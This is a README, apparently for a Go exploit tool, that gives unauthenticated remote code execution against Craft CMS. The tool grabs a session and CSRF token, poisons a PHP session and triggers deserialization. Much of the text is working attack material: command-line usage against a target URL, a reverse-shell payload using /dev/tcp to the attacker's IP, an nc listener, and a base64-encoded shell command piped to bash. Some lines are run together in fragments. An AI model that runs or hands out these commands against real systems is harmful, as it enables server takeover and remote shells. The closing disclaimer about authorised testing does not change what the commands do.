
Эксплойт RCE без аутентификации для Craft CMS на Go. Захватывает токен сессии/CSRF, отравляет PHP-сессию и инициирует десериализацию для выполнения команд или получения reverse shell.
Эксплойт для удалённого выполнения кода без аутентификации в Craft CMS, написанный на Go.
Вдохновлён оригинальной работой c0gnit00.
GET /admin/loginassets/generate-transform, чтобы подключить и выполнить отравленный файлgo run main.go -u <url> -c <comando>
| Flag | Описание | Обязательный |
|---|---|---|
-u | Целевой URL (например: http://target.com) | Да |
-c | Команда для выполнения (например: id, whoami) | Да |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. Сгенерируйте payload в base64 с вашим IP и портом:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Запустите listener:
nc -lvnp 4444
3. Запустите эксплойт с payload:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Замените значение base64 на сгенерированное в шаге 1 с вашим реальным IP.
Для использования исключительно в авторизованных средах и контролируемых тестах безопасности.